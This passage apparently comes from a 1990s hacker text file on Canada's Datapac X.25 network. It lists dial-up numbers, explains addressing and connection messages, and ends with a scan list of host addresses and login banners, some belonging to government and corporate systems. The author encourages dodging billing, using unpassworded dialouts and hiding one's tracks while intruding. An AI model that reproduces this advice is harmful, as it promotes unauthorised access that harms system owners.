  15280. Courtenay/Comox (BC)                                       604-334-9846
  15281. Dawson Creek (BC)                                          604-782-8549
  15282. Drayton Valley                                             403-542-2300
  15283. Drummondville (QUE)                                        819-478-1741
  15284. Duncan (BC)                                                604-746-8241
  15285. Edmonton (ALTA)                 403-421-1428               403-429-2492
  15286. Edmundston (NB)                                            506-735-8809
  15287. Fort McMurray (ALTA)                                       403-790-2300
  15288. Fort St John (BC)                                          604-787-8402
  15289. Fredericton (NB)                506-459-2792               506-453-0754
  15290. Granby (QUE)                                               514-375-9666
  15291. Grand Centre (ALTA)                                        403-594-2636
  15292. Grande Prairie (ALTA)                                      403-532-4533
  15293. Guelph (ONT)                    519-763-3610               519-763-1280
  15294. Halifax (NS)                    902-453-9100               902-453-2666
  15295. Hamilton (ONT)                  416-523-6948               416-523-6855
  15296. Kingston (ONT)                  613-546-0039               613-546-5764
  15297. Kitchener (ONT)                 519-741-4000               519-741-1499
  15298. Lethbridge (ALTA)                                          403-320-6200
  15299. Lindsay (ONT)                                              705-328-2941
  15300. Lloydminster (ALTA)                                        403-875-8069
  15301. London (ONT)                    519-432-2710               519-432-7101
  15302. Medicine Hat (ALTA)                                        403-528-3445
  15303. Moncton (NB)                    506-856-5196               506-383-7780
  15304. Montreal (QUE)                  514-861-4750               514-845-6014
  15305. Nanaimo (BC)                                               604-741-1552
  15306. Nelson (BC)                                                604-352-9258
  15307. New Glasgow (NS)                902-755-4594
  15308. North Bay (Ont)                                            705-495-4720
  15309. Oshawa (ONT)                                               416-404-0596
  15310. Ottawa (ONT)                    613-567-4552               613-563-7658
  15311. Peace River (ALTA)                                         403-624-1165
  15312. Penticton (BC)                                             604-490-0251
  15313. Port Alberni (BC)                                          604-723-6178
  15314. Port Hardy (BC)                                            604-949-8973
  15315. Powell River (BC)                                          604-485-9646
  15316. Prince George (BC)              604-561-9178               604-564-8953
  15317. Prince Rupert (BC)                                         604-627-8937
  15318. Quebec City (QUE)               418-647-2421               418-648-2611
  15319. Quesnel (BC)                                               604-992-3854
  15320. Red Deer (ALTA)                                            403-341-4033
  15321. Regina (SASK)                   306-525-8760               306-347-9073
  15322. Rimouski (QUE)                  418-725-3620
  15323. Sault St-Marie (ONT)                                       705-942-7030
  15324. Sarnia (ONT)                    519-339-9144               519-337-4727
  15325. Saskatoon (SASK)                306-934-9100               306-665-1046
  15326. Sherbrooke (QUE)                819-564-6417               819-829-1146
  15327. Smithers (BC)                                              604-847-9173
  15328. St Catherines (ONT)             416-687-3340               416-688-3433
  15329. St. Jerome                                                 514-565-6552
  15330. St John's (NFLD)                709-739-1499               709-739-6931
  15331. St Johns (NB)                   506-633-1021               506-652-1482
  15332. Ste Hyacinthe (QUE)                                        514-774-0720
  15333. Sydney (NS)                     902-562-8224
  15334. Terrace (BC)                                               604-638-8596
  15335. Toronto (ONT)                   416-979-1232               416-979-1251
  15336. Trois Rivieres (QUE)            819-373-9983               819-373-9070
  15337. Truro (NS)                      902-893-5434
  15338. Valleyfield (QUE)                                          514-377-2114
  15339. Vancouver (BC)                  604-662-8747               604-662-7865
  15340. Victoria (BC)                   604-380-3874               604-360-2673
  15341. Whistler (BC)                                              604-932-8927
  15342. William Lake (BC)                                          604-398-8632
  15343. Windsor (ONT)                   519-973-1086               519-973-4633
  15344. Winnipeg (MAN)                  204-947-6797               204-453-6099
  15345.  
  15346.                        Connecting and Addressing
  15347.  
  15348.     Once connected you will need to type one or three periods and a
  15349. carriage return, this will produce a numerical format denoting your port
  15350. address and node,
  15351.                            XXXX XXXX
  15352.     PORT Address-----------^    ^
  15353.     NODE number-----------------^
  15354.  
  15355.     Once this is established the network simply sits and waits for you to
  15356. spit commands at it, in other words an address to whence you would like to
  15357. travel. Failing this, idle time will have you disconnected, the time
  15358. varies but averages around 1 or 2 minutes.
  15359.  
  15360.     The formatting of a Datapac address is really quite simple and is
  15361. most often 8 digits long (sometimes ten but we'll get to that later)
  15362. The first four (the prefix) specify the current location in Canada,
  15363. for instance large cities will have several, just as they will have
  15364. more than one prefix in the phone directories. The last four digits
  15365. are arbitrary, and correspond to the host number.
  15366.  
  15367.     An address with ten numbers as opposed to eight (ie: xxxx xxxx xx) is
  15368. utilizing a subaddress.  Quite often these machines will be independent
  15369. of a cluster of nodes and there only to fulfill one task. Also they
  15370. may simply be segregated machines for no apparent reason at all
  15371. (except to make scans a bitch :>). Quite often you will find that
  15372. subsystems work as a PAD or PAC allowing you re-enter the Dpac from
  15373. a host level, therefore allowing you to make use of the company's
  15374. inherent NUI and connect to other places on the Dpac that disallow
  15375. collect calls.
  15376.  
  15377.  
  15378.                  Connecting to Machines on the Dpac
  15379.  
  15380.     Datapac, like most networks, uses NUIs (Network User ID) which
  15381. keep accounting for all billed connections.  HOWEVER a great deal of
  15382. machines on the Dpac allow for collect calls from within the network.
  15383. Yet if you have a valid NUI you may connect to ANY machine hooked up
  15384. to the Dpac (except those which are part of a closed user group).
  15385. I have found that it is best to PAD hop and avoid the whole NUI
  15386. problem entirely.  The following a list of connection messages
  15387. and their explanations for inter-network calls.
  15388.  
  15389. MESSAGE                         EXPLANATION
  15390. -------                         -----------
  15391. Call connected to: XXXXXXXX     A virtual circuit has been established
  15392.                                 between an originating DTE and a remote
  15393.                                 (receiving) DTE.
  15394.  
  15395. Hunted                          The remote logical channel is part of
  15396.                                 a hunt group.
  15397.  
  15398. Backed Up                       The call attempt to the remote DTE has failed.
  15399.                                 The network has re-directed the call to
  15400.                                 another predetermined DTE that has been
  15401.                                 optioned as backup.
  15402.  
  15403. I                               The call has been placed to an international
  15404.                                 address.
  15405.  
  15406. P                               Priority service.  Packet size: 128.
  15407.  
  15408. N                               Normal service.  Packet size: 128 or 256.
  15409.  
  15410. DNA                             Data Network Address of the originating DTE.
  15411.  
  15412. LCN                             Logical Channel Number of the recipient DTE.
  15413.  
  15414. NUI                             The call will be billed to the 6 to 8
  15415.                                 character Network User Identifier.
  15416.  
  15417. CUG                             The recipient DTE is part of a closed user
  15418.                                 group.
  15419.  
  15420. Reverse Charge                  The recipient DTE has accepted the charge
  15421.                                 associated With the established call.
  15422.  
  15423.     These reactions apply to any calls made that are not "international"
  15424. I will list the connect reactions for international calls in the following
  15425. section.
  15426.  
  15427.  DATAPAC INTERNATIONAL ACCESS PROCEDURES
  15428.  ---------------------------------------
  15429.  
  15430.     Datapac International provides outgoing and incoming access to 6 U.S.
  15431. based Networks and to over 100 packet-switched networks around the world.
  15432. To successfully complete such calls, Datapac has implemented the International
  15433. CCITT X.75 procedures and X.121 International numbering plan.  Thus, the
  15434. Datapac user originating an international call must use the following format:
  15435.  
  15436.                                            (1) (DNIC) (FOREIGN ADDRESS)
  15437.                                             :     :          :
  15438.       One defines the Datapac International.:     :          :
  15439.       Prefix.                                     :          :
  15440.                                                   :          :
  15441.       Packet networks are identified by a ........:          :
  15442.       four digit number called a DNIC                        :
  15443.       (data network identification code)                     :
  15444.                                                              :
  15445.       The foreign national address is .......................:
  15446.       expressed as an eight to ten digit
  15447.       address.
  15448.  
  15449. Here is a list of useful DNIC's if you get the urge to scan "other" networks.
  15450.  
  15451.     Sprintnet         3110
  15452.     Bell South        3143
  15453.     Centel            3148
  15454.     BT Tymnet         3106
  15455.     Accunet           3134
  15456.     NYNEX             3144
  15457.     U.S. West         3147
  15458.     ADP Autonet       3126
  15459.     Fedex             3138
  15460.     Express           3139
  15461.  
  15462.     If you are scanning (which I assume you might be) you will encounter a
  15463. great many cryptic messages.  So many, in fact, I am sure you will loose
  15464. count.  Some are worth mentioning some are not but here a few you might
  15465. encounter.
  15466.  
  15467.    CALL CLEARED --     A network problem within Datapac
  15468.    TEMPORARY NETWORK   or a foreign network prevents either
  15469.    PROBLEM (XXY)       the requested call from being established
  15470.                        or the established call from being
  15471.                        continued.  Try again later.
  15472.  
  15473.   CALL CLEARED --     Either the foreign network requested is not
  15474.   ADDRESS NOT IN      accessible from Datapac, or the foreign
  15475.   SERVICE (XXY)       network address specified identifies a
  15476.                       non-existent destination, i.e., the address is
  15477.                       not yet assigned or no longer assigned.
  15478.                       Verify with destination that the foreign
  15479.                       network is accessible from Datapac and that
  15480.                       the foreign network address is assigned.
  15481.  
  15482.  CALL CLEARED --      The calling terminal is not permitted to
  15483.  ACCESS BARRED        establish an international call to the
  15484.  (XXY)                called destination address because of a
  15485.                       closed user group violation.  Verify
  15486.                       network address with destination.
  15487.  
  15488.   CALL CLEARED --     Either the foreign network or the
  15489.   COLLECT CALL        destination address is not willing to
  15490.   REFUSED (XXY)       accept the collect calls.  Verify the call
  15491.                       establishment procedures with destination.
  15492.  
  15493.   CALL CLEARED --     The Call Request is considered invalid
  15494.   INCOMPATIBLE        by the foreign network mainly because of
  15495.   CALL OPTIONS        the incorrect number of digits in the
  15496.   (XXY)               foreign network address.  Verify foreign
  15497.                       network address with destination.
  15498.  
  15499.   CALL CLEARED --     The destination is out of order, possibly
  15500.   DESTINATION NOT     because the destination's network access
  15501.   RESPONDING (XXY)    link is inoperative.  Try again later
  15502.                       and verify with destination.
  15503.  
  15504.   CALL CLEARED --     The destination address called is fully
  15505.   DESTINATION BUSY    engaged (no logical channels available)
  15506.   (XXY)               and cannot accept another call at this
  15507.                       time.  Try again later.
  15508.  
  15509.   CALL CLEARED --     This message indicates a protocol error at
  15510.   REMOTE PROCEDURE    the remote DTE interface.  Check with remote
  15511.   ERROR (XXY)         DTE  (destination).
  15512.  
  15513.  
  15514.                       Outdials on Dpac
  15515.  
  15516.     On most Dpac dialups there are also dialouts, however to use them you
  15517. must either be calling from a Host on the Dpac or have a public access
  15518. NUI.  The latter tends to be more difficult to get than the former.  A list of
  15519. addresses for dialouts is available at 9210 0086 (the Datapac help
  15520. center), however it is OLD and therefore somewhat inaccurate so I have
  15521. not included it.  Also you will find that a majority of the dialouts
  15522. are of the low baud rate variety, however there are a few 19.2
  15523. dialouts as well.
  15524.  
  15525.     While dialouts are quite often a pain in the ass to access, all hope is
  15526. not lost.  Many of the machines you encounter on Dpac are LATservers,
  15527. Gandalfs, System/370s, etc. with dialouts.  I have found more
  15528. than a few that are COMPLETELY un-passworded with Global access
  15529. dialouts.
  15530.  
  15531.     Beyond all this, Dpac can also be very useful for covering your
  15532. tracks while attempting to perform digital voyeurism on other networks
  15533. like Sprintnet, Tymnet, etc.  It may mean that you have less leeway but it
  15534. still makes the target site go through a bit more difficulty in tracking
  15535. you down.
  15536.  
  15537.     In closing this, I am leaving a scan through which you can get familiar
  15538. with Dpac.  It is far from complete as a guide to Datapac, but lists
  15539. many of the systems I have found that accept collect calls.
  15540. I will first list prefixes and the areas they represent.
  15541.  
  15542.     If you are looking a decent Datapac Scanner you can get one at
  15543. 403-283-5519, while this is not a public system, it will allow guest
  15544. users to log on and transfer a scanner made for Procomm for Windows
  15545.  
  15546.                      Partial Datapac Prefix List
  15547.  
  15548. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  15549. Calgary (ALTA)            6330   |    Clarkson (ONT)            9190
  15550. Edmonton (ALTA)           5870   |    Halifax (NS)              7610
  15551. Hamilton (ONT)            3850   |    Kitchener (ONT)           3340
  15552. London (ONT)              3560   |    Montreal (QUE)            8270
  15553. Ottawa (ONT)              8570   |    Quebec City (QUE)         4840
  15554. Regina (SASK)             7210   |    St-John's (NB)            7460
  15555. Saskatoon (SASK)          7110   |    St. John (NFLD)           7810
  15556. Toronto (ONT)             9160   |    Vancouver (BC)            6710
  15557. Windsor (ONT)             2950   |    Winnipeg (MAN)            6920
  15558. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  15559.  
  15560.                              Scan List
  15561.  
  15562. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  15563. <] NUA [>         <] Service Name [>    ($ = Refused Collect Connection)
  15564. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  15565. 20100071           $ VM/SP
  15566. 20200115             VAX/VMS
  15567. 20200116             VAX/VMS
  15568. 20200156             Diand Information System
  15569. 20200214           $ UNIX      (gtagmhs2)
  15570. 20200230             METS Dial-In Server  Enter your login name:
  15571. 2020024098           Control Port on Node Ottawa 6505 PAD
  15572. 20200286           $ VAX/VMS
  15573. 2020032099           MPX.25102: PASSWORD
  15574. 20200321             SunOS     Rel 4.1.3 (X25)
  15575. 20200322             SunOS          ""
  15576. 20200330             INETCO    Magicbank
  15577. 20200342             ::
  15578. 20200497             VAX/VMS
  15579. 202005421          $ VAX/VMS
  15580. 20200548             SunOS     Rel 4.1.3 (TMS470)
  15581. 20200582           $ VAX/VMS   Production System
  15582. 20200586             ULTRIX    v4.2 (fcsa)
  15583. 20200600           $ User Id/Usager:
  15584. 20200602           $ UNIX      (gtagmhs)
  15585. 20400011           $ VM/SP     BNRCEN
  15586. 20400089             XMUX      node: 320QUEEN
  15587. 20400157             HP3000    IDRC/CDRI/CIID:
  15588. 20400177             QL * IDENTIFIEZ-VOUS SVP * PLEASE SIGN ON:
  15589. 2040017777           GST Questions & Answers by Revenue Canada
  15590. 20400180             XMUX      node: STORE305
  15591. 20400205             VAX/VMS
  15592. 20400210             VMS/VAX
  15593. 20400249             UNIX
  15594. 20400268           $ VAX/VMS
  15595. 20400407           $ VAX/VMS
  15596. 20400459             MHP1201I TERMINAL CONNECTED TO PACKET/74
  15597. 20400470             ISM/TSO   READY TO HOST
  15598. 20400478             HP3000
  15599. 20400484             VAX/VMS
  15600. 20400529           $ XMUX      node: SMITHFLD
  15601. 20400642             CDCNET
  15602. 20400683             PACX      (user interface)
  15603. 20400712             UNIVERSITY OF OTTAWA
  15604. 20400860             VAX/VMS
  15605. 20401313             Network
  15606. 20401375             DATAPAC: DOT SYSTEM READY
  15607. 20500011             VM/SP     Canada Institute for Scientific & Tech Info
  15608. 20500036             enter v for vtam (roscoe or tso) d for dobis
  15609. 20500047           $ #
  15610. 20600029             SCO       domus1   SCO v/386
  15611. 20600222             Please enter password
  15612. 20700038           $ VAX/VMS
  15613. 20700040             Enter profile ID:
  15614. 20700053             NODE 57206798 (looks like an iNet2000?)
  15615. 20700122             XMUX      node: OTTAWA
  15616. 20700157             UNIX      ""
  15617. 20700187           $ VAX/VMS   Canada Centre for Remote Sensing Satellite Op.
  15618. 20700194             iNet2000
  15619. 20700195             iNet2000
  15620. 20700201           $ HP3000 Supply & Services Canada
  15621. 20700326             DATAPAC : NBA SYSTEM READY
  15622. 20700416             Operator Code:
  15623. 20700439             UNIX      (bcm_kernel)
  15624. 20700471             ISM       (7/E/1) ISM Systems Corp/Ottawa Processing
  15625. 20700538             XMUX      node: TMIXMUX0
  15626. 20700539             XMUX      node: TMIXMUX1
  15627. 20700540             XMUX      node: TMIXMUX2
  15628. 20700541             UNIX
  15629. 20700561
  15630. 20700591             Canadian Intl. Development Agency's BBS(CIDA)
  15631. 20700596             UNIX      Zoomit
  15632. 20700603             VAX/VMS
  15633. 20700611           $ DIAND INFO SYSTEM. ENTER SERVICE NAME
  15634. 20700615             SCO OD    Statsys1
  15635. 20700616           $ UNIX      gateway!login:
  15636. 20700617             UNIX      Zoomit
  15637. 20700652             UNIX
  15638. 20700665           $ NC-PASS
  15639. 20700666           $ NC-PASS
  15640. 20700718             OBS Online Services (WYLBUR)
  15641. 20700728             VAX/VMS
  15642. 20700740             UNIX
  15643. 20700741             VAX/VMS
  15644. 20800015             VAX/VMS
  15645. 20800033             VAX/VMS   v5.5-1
  15646. 20800043           $ DIAND Info System - INAC. Sioux Lookout.
  15647. 20800095             TSO
  15648. 20800187             VAX/VMS   FCSA System VAX/VMS 4.2
  15649. 21200014             CDCNET
  15650. 21200030           $ PACX
  15651. 21300047             Please Enter Password
  15652. 21600001             ::
  15653. 21700054             VAX/VMS
  15654. 21700073             ::
  15655. 22100034             HP3000    Burgess Wholesale Foods  MPE/XL -Kingston
  15656. 22100138             INT NET  Enter SecurID Passcode:
  15657. 22100188             VAX/VMS
  15658. 22400041             XMUX      node: BELLEVIL
  15659. 22600049             SERVICE ID=
  15660. 22700017             VAX/VMS
  15661. 23400121           $ UNIX      orillia x25
  15662. 23600035             VAX/VMS   Micro VAX 3100 / VMS 5.5
  15663. 23800176             VAX/VMS   v5.5-1
  15664. 23800236             XMUX      node: OTTAWA
  15665. 23800343             node 57216d65 (looks like an iNet2000)
  15666. 23800451           $ VAX/VMS   Certification System
  15667. 23800491             UNIX      X.29 Terminal Service
  15668. 23800505             ONLINE SERVICES(WYLBUR) ENTER USER ID-
  15669. 23800507                          ""       ""
  15670. 23800594             ENTER FUNCTION:(Fisheries & Oceans Canada)
  15671. 23800599             XMUX      node: MUX8
  15672. 23800684             VAX/VMS   INFOMART ONLINE
  15673. 23800685             VAX/VMS   INFOMART ONLINE
  15674. 23800700             SCO OD    vmabs   SCO Open Desktop
  15675. 24300084             VAX/VMS   v5.5
  15676. 24300149             XMUX      node: SAULTE
  15677. 24400061             SERVICE ID=
  15678. 24400096             DATAPAC : SUD SYSTEM READY
  15679. 24400146             HP3000    PROD.MULTICAR.SUDBURY  MPE XL
  15680. 24700021             SERVICE ID=
  15681. 24900011             VAX/VMS   INFOMART ONLINE
  15682. 24900024             ISM       (7/E/1) ISM Systems Corp. Ottawa Proc. Centre
  15683. 24900040             VAX/VMS
  15684. 24900057             ISM
  15685. 24900099             PACX      Gandalf Access Server
  15686. 25200014             TAL TORONTO
  15687. 25200017             VM/SP
  15688. 25200054             XMUX      node: TORONTO
  15689. 25200214             ISM       GUARDIAN INSURANCE - ENTER SYSTEM
  15690. 25200258             ::
  15691. 25700031             >
  15692. 25700057             VAX/VMS
  15693. 26100091             VAX/VMS
  15694. 28300080             VAX/VMS
  15695. 28300083             XMUX      node: XMUX1
  15696. 28300092             INETCO
  15697. 28300154             VAX/VMS
  15698. 28700014             VAX/VMS
  15699. 28700029             SERVICE ID=
  15700. 28700030             LEVITT SAFETY / THUNDER BAY
  15701. 29200013             VAX/VMS
  15702. 29300045           $ VAX/VMS
  15703. 29400052             Compuserve
  15704. 29400172             VAX/VMS
  15705. 29400176             Enter System Id:
  15706. 29400254             XMUX      node: WINDSOR
  15707. 29400263             ISM       CDNC
  15708. 29400264             ISM       CDNC
  15709. 29500009           $ Datapac Public OD
  15710. 29500071           $        ""
  15711. 29500072           $        ""
  15712. 29500073           $        ""
  15713. 29500074           $        ""
  15714. 29500075           $        ""
  15715. 29500092             ::
  15716. 29500137             ::
  15717. 29500139             PRIMOS    23.3.0  INTENG
  15718. 29500166           $ Datapac Public OD
  15719. 29500167           $        ""
  15720. 29500168           $        ""
  15721. 29500900           $        ""
  15722. 29500901           $        ""
  15723. 29600018             PRIMOS    v23     FAXON
  15724. 29600136             KMUX      GANDALF KMUX PWORD>
  15725. 2960075101           INETCO    Polystar E.C.U
  15726. 30500153             AXA Canada Data Center(PACKET/74)
  15727. 31500065             SCO OD    isgsys1   SCO Open Desktop 2.0
  15728. 31500076           $ PACX      UWO Computing & Communications Services
  15729. 315000767            XMUX      node: CCSMUX1
  15730. 31500083             XMUX      node: LONDON
  15731. 31500225             SCO OD    isg2      SCO Open Desktop 2.0
  15732. 31500490             XMUX      node: LONDON
  15733. 31500528             XMUX      node: SARNIA
  15734. 31500607             PRIMOS    23.3.0.R20   WPPENG
  15735. 31500726             UNIX      ADC T-SENTRY
  15736. 31500787             XMUX      node: BUNTINRI
  15737. 31500838             MHP201A DTPAC06L VER 7.0.3 APPLICATION:
  15738. 32400014             XMUX      node: LONDON
  15739. 32400016             ISP-LOGON-CHRISTIE
  15740. 32400067           $ VM/SP
  15741. 32400107             PRIMOS    22.1.2.R38   HUNT
  15742. 32400122               "           ""
  15743. 32500023             XMUX      node: LONDON1
  15744. 32500053             XMUX      node: 074
  15745. 32500099             XMUX      node: WIND
  15746. 32500149             enter passcode:
  15747. 32500202             VAX/VMS   W.R.C.S.S.B
  15748. 32500225             VAX/VMS   London system A - Boot Node - MicroVMS v4.7
  15749. 32500239             VAX/VMS
  15750. 32500274             VAX/VMS
  15751. 32500345           $ MHP1201I TERMINAL CONNECTED TO PACKET/74
  15752. 32500367             XMUX      node: WINDSOR
  15753. 32500369             UNIX
  15754. 32500383             XMUX      node: STERLING
  15755. 325003833            BOSX/DPX  (RISC?) Sterling Marking Products Inc.
  15756. 32500386             5251 Controller emulator - v.191 Password:
  15757. 32500396             VAX/VMS   MicroVMS 5.3-1
  15758. 32500406             VAX/VMS   MicroVMS 5.3-1
  15759. 32500523             SERVICE ID=
  15760. 32500680             XMUX      node: WINDSOR
  15761. 32500692             XMUX      node: WINDSOR
  15762. 32500713             XMUX      node: STTHOMAS
  15763. 32500850             DATAPAC: WII SYSTEM READY
  15764. 32600052             Compuserve
  15765. 32600056             PRIMOS    22.1.2.R3    PBTOOL
  15766. 32600243             VAX/VMS
  15767. 33400115             SERVICE ID=
  15768. 33400223             Adjusters Canada Inc. Please enter X25 Security
  15769. 33400246             PRIMOS    22.0.3.R37    BLTCAD
  15770. 33400306           $ Datapac Public OD
  15771. 33400337           $        ""
  15772. 33400344           $        ""
  15773. 33400345           $        ""
  15774. 33400346           $        ""
  15775. 33400347           $        ""
  15776. 33400348           $        ""
  15777. 33400349           $        ""
  15778. 33400521             ISM
  15779. 33400550             ULTRIX
  15780. 33400589           $ Datapac Public OD
  15781. 33400590           $        ""
  15782. 33400591           $        ""
  15783. 33400609             ISM
  15784. 33400630             PRIMOS     22.1.3 THOR Engle Canada
  15785. 33400672             UNIX       192.9.200.1
  15786. 334006723            MACHINE    (XMUX machine)
  15787. 33400694             Sim3278
  15788. 33400703             UNIX       AT&T SV - WLU
  15789. 3340070399           MPX.25102: PASSWORD
  15790. 33400892             ===>
  15791. 33400900           $ Datapac Public OD
  15792. 33400901           $        ""
  15793. 33401149             XMUX      node: KITCH
  15794. 33401414             Datapac Public OD
  15795. 33401415                    ""
  15796. 33401453             DYNIX     SpaeNaur SVR4
  15797. 33401462             Datapac Public OD
  15798. 33401475             Chase IoLan Terminal Server
  15799. 334014751            XMUX      node: WATERLOO
  15800. 33401528             UNIX
  15801. 33401537             Sim3278
  15802. 33500021             JMS Online Service. Please enter ID:
  15803. 33500033           $ ENTER LOGON REQUEST
  15804. 33500081             JMS Administator line. Enter SYSTEM or SERVICE.
  15805. 33500099                                 " "
  15806. 33500110             XMUX      node: WATERLOO
  15807. 33500136             Wilfrid Laurier University x.25 PAD
  15808. 33500142             Prudential Assurance / Kitchener
  15809. 33500196             University of Waterloo online Library
  15810. 33700015             PICK
  15811. 33700115             STARMASTER Agriculture Canada Ontario Regional Com. Cent.
  15812. 33700133             XMUX      node: 362
  15813. 33700216             XMUX      node: 767
  15814. 33700236             VAX/VMS   Wellington Country Roman Catholic School Board
  15815. 33700238             VAX/VMS
  15816. 33700345             VAX/VMS
  15817. 33700346           $ HP3000DTC Enter DTC port password:
  15818. 33700348             DATAPAC : KIT SYSTEM READY
  15819. 33700349           $ ZAM0001
  15820. 33700376           $ VAX/VMS   Ontario College Application Service
  15821. 33700393             ::
  15822. 33700465             ISM       NET-PASS NPA MAGIC
  15823. 34100013             VAX/VMS
  15824. 34200139             SERVICE ID=
  15825. 35100010           $ VAX/VMS
  15826. 35500179             PICK      WELCOME TO HAC INFO NETWORK
  15827. 35600110           $ Datapac Public OD
  15828. 35600158             UNIX      3x3
  15829. 35600273             DEVELNET  University/Hospital Network
  15830. 35600900           $ Datapac Public OD
  15831. 35600901           $        ""
  15832. 36200027             MHP201A U0000053  Ver 7.0.5 APPLICATION:
  15833. 36700021             USER NUMBER --
  15834. 36700026             VAX/VMS
  15835. 36700030             USER NUMBER --
  15836. 36700038           $ UNIX
  15837. 36700059             QINTER
  15838. 36700115             OCC System
  15839. 36700126             SERVICE ID=
  15840. 36700172             SAFEGUARD 2>
  15841. 36700183             XMUX      node: DP01
  15842. 36700184             XMUX      node: DP02
  15843. 36700185             HP3000
  15844. 36700369             NETWORK CONTROL
  15845. 36700372             SAFEGUARD 4>
  15846. 36700381             Sim3278
  15847. 36700382             Sim3278
  15848. 37200020             VAX/VMS
  15849. 37500014             VAX/VMS
  15850. 37600014             SERVICE ID=
  15851. 37600020             HP3000    HP900.HCB.CANADA  MPE/XL
  15852. 37600027             MHP1201I TERMINAL CONNECTED TO PACKET/400
  15853. 37600029             XMUX      node: HAMILTON
  15854. 37600044           $ ISM       SCC INTERACTIVE SERVICES
  15855. 37600066             MHP1201I TERMINAL CONNECTED TO 4.15 PACKET/74
  15856. 37600152             XMUX      node: HAMILTON
  15857. 37600166             XMUX      node: BUTLER
  15858. 37600176             XMUX      node: DISCOUNT
  15859. 38300083             VAX/VMS
  15860. 38500079           $ TANGRAM ARBITER LU1
  15861. 38500085             HCH Magic
  15862. 38500122             PACX      CCINFO
  15863. 38500150           $ Datapac Public OD
  15864. 38500151           $        ""
  15865. 38500152           $        ""
  15866. 38500153           $        ""
  15867. 38500154           $        ""
  15868. 38500163           $        ""
  15869. 38500164           $        ""
  15870. 38500165           $        ""
  15871. 38500198           $        ""
  15872. 38500200           $        ""
  15873. 38500201           $        ""
  15874. 38500202           $        ""
  15875. 38500203           $        ""
  15876. 38500204           $        ""
  15877. 38500205           $        ""
  15878. 38500226             XMUX      node: (no node name)
  15879. 38500262             Please enter your operator number
  15880. 38500329             #
  15881. 38500356             PACX      CCINFO
  15882. 38500399             SERVICE ID=
  15883. 38500400             ::
  15884. 38500431             VAX/VMS
  15885. 38500586             VAX/VMS   MicroVMS v5.3
  15886. 38500891             VAX/VMS
  15887. 38500900           $ Datapac Public OD
  15888. 38500901           $        ""
  15889. 38501019             XMUX      node: WELLAND
  15890. 38501149             XMUX      node: CPNWRI
  15891. 38501151             VAX/VMS
  15892. 38501155             DATAPAC : BUR SYSTEM READY
  15893. 38501175             CDCNET
  15894. 38501194             VAX/VMS   AEG Electrocom CDN_CECO  V25.3
  15895. 38700015             VAX/VMS   BURCOM - MicroVAX ][ - MSB
  15896. 38700022             XMUX      node: RBURL
  15897. 38700048             PRIMOS    20.2.6 SYSD
  15898. 38700068           $ Bailey Controls Canada
  15899. 38700119             ::
  15900. 38700127             XMUX      node: STORE031
  15901. 38700132             XMUX      node: LIMRIDGE
  15902. 38700152             PRIMOS    20.2.6 SYSF
  15903. 38700153             PRIMOS    20.2.6 SYSL
  15904. 38700155             XGATE:
  15905. 38700162             XMUX      node: QUEENSTN
  15906. 38700261             XMUX      node: HAMILTON
  15907. 38700262             XMUX      node: FORTERIE
  15908. 38700426             XMUX      node: HAM
  15909. 38700583             XMUX      node: DISCNT2
  15910. 38700629             XMUX      node: NIAGARA
  15911. 39100017             MERLIN    SYSTEM 2
  15912. 39100019             MERLIN     ""
  15913. 39100020             MERLIN     ""
  15914. 39100041             Id:          LU:Z0068
  15915. 39100043             Id:          LU:Z0070
  15916. 39100044             Id:          LU:Z0077
  15917. 39100045             Id:          LU:Z0078
  15918. 39100049             Green Line Investor Services
  15919. 39100057             VAX/VMS   Burns Fry Analytics Inc. Fixed Income Research
  15920. 39100077             Toronto Public Library
  15921. 391000775            XMUX      node: TPL
  15922. 39100092             INT/UNIX  system name: cirus 2  INTERACTIVE SYSTEMS CORP.
  15923. 39100146             XMUX      node: STORE088
  15924. 39100200             iNet2000
  15925. 39100234             VAX/VMS   Burns Fry Ltd.  MicroVAX 3800
  15926. 39100395             HP3000
  15927. 39100498             STARMASTER
  15928. 39100503             MERLIN    SYSTEM 2
  15929. 39100566             STARMASTER     NORBORD Industries
  15930. 39100566             Console
  15931. 39100581             AOS/VS
  15932. 39400100             iNet2000
  15933. 39400101             iNet2000
  15934. 39500032             INFOGLOBE DATABASE--PLEASE SIGN ON
  15935. 39500032             Globe & Mail
  15936. 40100012             PACX      U.C.G.  PACX 2000
  15937. 41100043             Infoglobe
  15938. 41100045             Interactive UNIX
  15939. 41100054             Green Line Investor System
  15940. 41100065             Imprimerie Quebec
  15941. 41100301             Prime Net
  15942. 41100656             Lotus CSG
  15943. 41100681             ??
  15944. 43900170             ECHO System
  15945. 55500010             French?
  15946. 59100088             U Of A 3000 System
  15947. 59100092             Keyano College-Alberta
  15948. 59100099             VMS/VAX
  15949. 60100010             U of Alberta
  15950. 62400440             UNIX 2000 System
  15951. 62600009             Private Network
  15952. 62600045
  15953. 62600046             Service Id:
  15954. 66600062             Van-Reg
  15955. 66600180             ??
  15956. 67100752             User Name?
  15957. 67101408             ??
  15958. 67101700             Cloverdale Paint
  15959. 67101802             VMS/VAX
  15960. 69100018             CYBERSHARE
  15961. 69100376             VMS/VAX
  15962. 69200032             Lucky (VMS/VAX)
  15963. 69200239             Environment Winnepeg
  15964. 69200343             User Id:
  15965. 70300066             Brandon University
  15966. 72100315             SPMC (VMS/VAX)
  15967. 72100465             MCR
  15968. 72101002             VMS/VAX
  15969. 72101058             SPECIFY APPLICATION DESIRED
  15970. 72101109             Information System Management
  15971. 72400014             Max Daisley System (VMS/VAX)
  15972. 72400100             Envoy
  15973. 72400101             Envoy
  15974. 78100092             VMS/VAX
  15975. 78100209             VMS/VAX
  15976. 78100265             VMS/VAX
  15977. 78100476             Hewlett Packard System
  15978. 78100876             DYNIX S6000
  15979. 78101097             VMS/VAX
  15980. 79400100             Envoy
  15981. 84400095             Profits
  15982. 84400237             Service Id:
  15983. 84400312             GEnie Network
  15984. 84400513             SuperDOS
  15985. 84400526             BNF: DATAPAC SYSTEM READY
  15986. 84400571             Daily Oil & Associates BBS
  15987. 84800410             VMS/VAX
  15988. 84800535             CAS: DATAPAC
  15989. 84800700             VMS/VAX
